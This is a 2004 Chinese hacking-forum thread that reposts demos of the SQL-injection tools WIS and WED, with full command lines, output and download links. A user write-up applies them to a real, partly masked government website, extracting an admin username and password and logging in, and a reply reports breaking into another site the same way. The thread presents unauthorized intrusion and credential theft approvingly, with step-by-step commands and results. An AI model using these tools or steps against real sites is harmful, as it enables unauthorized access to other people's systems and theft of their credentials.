论坛: 黑客进阶 标题: 榕哥出新东西了刚刚才发现晚了!(转载) 复制本贴地址    
作者: 阿拉飞 [witenvoy]    论坛用户   登录
本帖由 [落叶飘风] 从 << 轻松一刻 >> 转移而来

转载:
[WED] 2004/08/29

WED (Web Entry Detector),针对存在SQL Injection的网站对管理帐号进行扫描。

Demo: 对通过WIS扫描出的存在SQL Injection漏洞的网站进行后台管理帐号扫描

C:\>WED.exe http://www.someaspsite.com/shownews.asp?newsid=1544

Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26
http://www.netXeyes.com,   security@vip.sina.com

#### Phrase 0: Check Enviroment ####
Get Row 1, Set Sensitive 250, Max Threads is 30
File C:\TableName.dic Opened
File C:\UserField.dic Opened
File C:\PassField.dic Opened

#### Phrase 1: Process Argv ####
Host:www.someaspsite.com
Page:/shownews.asp?newsid=1544

#### Phrase 2: Detect SQL Injection ####
SQL Injection Detected.

#### Phrase 3: Get Cookies ####
Tag: 2017
Cookie: ASPSESSIONIDSADSBTAS=BIMAMMNCLCCIFICPLNEMFKND; path=/

#### Phrase 4: Starting Get Table Name ####
Tag: 45
Got Table Name is "users"

#### Phrase 5: Starting Get Name Field ####
Tag: 45
Got Name Field is "name"

#### Phrase 6: Starting Get Length of Field "name" ####
Tag: 24
Got Length of Field "name" is: 13

#### Phrase 7: Starting Get Password Field ####
Tag: 45
Got Password Field is "pwd"

#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 9

#### Phrase 9: Starting Brute Field "name" and "pwd" (Access Mode) ####

name is: administrator
pwd is: admin@bvn

C:\>

到这一步,就可以通过WIS扫描获得的管理页面后台登陆了。

[WIS] 2004/08/29

WIS (Web Injection Scanner),自动对整个网站进行SQL Injection 脆弱性扫描,并且能够扫描后台登陆界面。

Demo1: 扫描整个网站,找出存在SQL Injection的页面

C:\>wis http://www.someaspsite.com/

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com   security@vip.sina.com
 

Scanning http://www.someaspsite.com/,   Page: Unlimited
Patient, Please....

(001 + 000) Checking: /shownews.asp?newsid=204
SQL Injection Found: /shownews.asp?newsid=204

Injection Page Final Result:
============================
/shownews.asp?newsid=204

C:\>

Demo2: 扫描后台管理页面

C:\>wis http://www.someaspsite.com/   /A

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com   security@vip.sina.com

Scanning http://www.someaspsite.com/,   Page: Unlimited, Detect Access Page
Patient, Please....

(004 + 005) Access Page: /www.asp
(004 + 006) Access Page: /wwwstats.asp
(004 + 006) Access Page: /wwwlog.asp
(004 + 006) Access Page: /wstats.asp
(004 + 006) Access Page: /work.asp
(005 + 007) Access Page: /webstats.asp
(000 + 016) Access Page: /gansu2/tjhg.files/admin_index.asp
(000 + 015) Access Page: /gansu2/tjhg.files/admin.asp
(000 + 012) Access Page: /gansu2/gs.files/admin_index.asp
(000 + 011) Access Page: /gansu2/gs.files/index_admin.asp
(000 + 010) Access Page: /gansu2/tjhg.files/admin_del.asp
(000 + 009) Access Page: /gansu2/ddddd.files/manage.asp
(000 + 003) Access Page: /gansu2/ddddd.files/index_admin.asp

Access Page Final Result:
============================
/gansu2/login.asp (200 OK)

Scan Finished

C:\>


试用榕哥新工具WIS和WED的一次注入实例 

作者:EvilBogy      来自:http://eviloctal.hackway.net

软件下载
http://www.netxeyes.com/wis.rar
http://www.netxeyes.com/wed.rar



正文:

网站http://gx**.***.gov.cn(由于漏洞较多,估计一时无法通知修补,此处的URL做*号屏蔽处理。)存在SQL INJECTION漏洞,不过别问我怎么知道的啊,哈哈。不过这个站的表还真....XX的多,之前我用ASC竟然扫出2000多个表出来,真是晕。刚好看到榕哥出了新工具,当然马上就下来使用一下啦。



具体使用说明请参阅本站的
http://www.eviloctal.com/forum/read.php?fid=24&tid=1852&page=lastpost#lastatc


下面开始(两个工具都是命令行下使用的)

wed.exe http://gx**.***.gov.cn/company/index.asp?id=189

这是我原来发现的存在漏洞页面,很快结果就出来了:
user is gx*****
pass is gx*****

呵呵又一个用户名和密码一样的。

  WED.EXE功能主要是猜解用户名和密码,没什么好说的。
主要注意的就是工具自带的用户表名和密码表名以及用户字段名不是很详细,不在里面的就猜不出来了,这个就需要大家自己完善了。


 





  WIS.EXE带有两个功能,都比较实用,分别是针对网站检查存在可以注入的页面否和检测后台登陆页面的地址。

wis.exe http://gx**.***.gov.cn/

等待一下,结果出来了:

injection page final result:

/syjh/search.asp?sortid=1
/spzs/search.asp?sortid=1
/spzs/exhibition.asp?gsid=621
/qyml/search.asp?sortid=28
/spzs/show_product.asp?id=510

找到了5个程序认为可以注入的页面。
(不过我逐一试了,结果都是不成功,在猜密码的时候失败,估计是程序自带的表名没有符合该网站的。)




上面一开始的时候我们获得了一个用户名和密码,下面我们找后台管理页面登陆一下试试。

wis.exe http://gx**.***.gov.cn/   /a(注意这里后面要加参数 /a)

漫长的等待  扫描ing.............算了还是手动吧

一般网站都有一个登陆的地方,你登陆后一般都可以看到登陆的地址了,有些网站是在你退出的时候浏览器下面的状态栏那里会出现一下。要眼明手快哦。
在首页处登陆成功,这时地址是http://gx**.***.gov.cn/manage/index.asp呵呵,看到了吧。还有一个是http://gx**.***.gov.cn/login/login.asp两个地址都是指向一样的页面。
看来WIS自带的路径还是太少啊。手动添加进去吧,打开admin文档,加入manage/index 和login/login 保存。

hehe,不过实际上网站管理后台的URL是http://gx**.***.gov.cn/admin/login.asp


因为是试用举例,所以也就没有深入去进管理后台,到这里就可以了。


试用结论:
不愧是榕哥出品,真的很好用的两个工具,可以想象又将掀起一轮ASP注入的浪潮。不足的地方就是工具自带的dict内容太少了,有一定的局限,需要大家自己补充咯。




  兼于是命令行界面下的程序,有时手工输入URL实在是烦,这里提供一个小TIPS.....................那就是...................编辑一个bat文件啦....哈哈~~




[此贴被 阿拉飞(witenvoy) 在 09月10日20时27分 编辑过]

地主 发表时间: 04-09-10 20:22

回复: 阿拉飞 [witenvoy]   论坛用户   登录
版主大哥,发错地方了,对不起啊!麻烦你转移下啊!
真是对不起啦!!!!!!!!1

B1层 发表时间: 04-09-10 20:26

回复: 拾大粪的老汉 [wulakeng]   论坛用户   登录
我还以为是‘榕胜哥’呢…………

B2层 发表时间: 04-09-10 21:22

回复: 唯恐天下不乱 [thinbug31]   论坛用户   登录
听说小榕经常是神出鬼没的!!
现在又露头了??


B3层 发表时间: 04-09-11 03:50

回复: 阿拉飞 [witenvoy]   论坛用户   登录
小榕呢,大叔别发火撒!:)

B4层 发表时间: 04-09-11 18:42

回复: 嘶风 [yimarong]   版主   登录
回头一定要找时间测试一下!

呵呵~一直没有发现哩!

B5层 发表时间: 04-09-11 20:23

回复: 逸然 [iamzhaokun]      登录
有价值,辛苦了!

B6层 发表时间: 04-09-14 09:57

回复: shuyee [shuyee]   论坛用户   登录
本来手动注入一个网站的,因是头一次入注,出了点错.
得此工具,一试之下,便拿到了帐号和密码,与和猜解成功的部分完全一致.
立即上网站登录,却提示不对.想了下,原因是拿到的admin表是个废表,所以会出错.
在字典中把该表名删了,再入注,找到user表,拿到帐号和密码,登录成功.

小榕的工具一旦拿到表,便不再测试其它表名,有些遗憾,当然这种单一表名猜解的速度却是很快.所以不成功时,可以考虑换别的表试试.得用废表,干扰入注,却也是个不错的办法,有点象加密,对付手动入注应该非常有效.

B7层 发表时间: 04-09-16 09:11

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号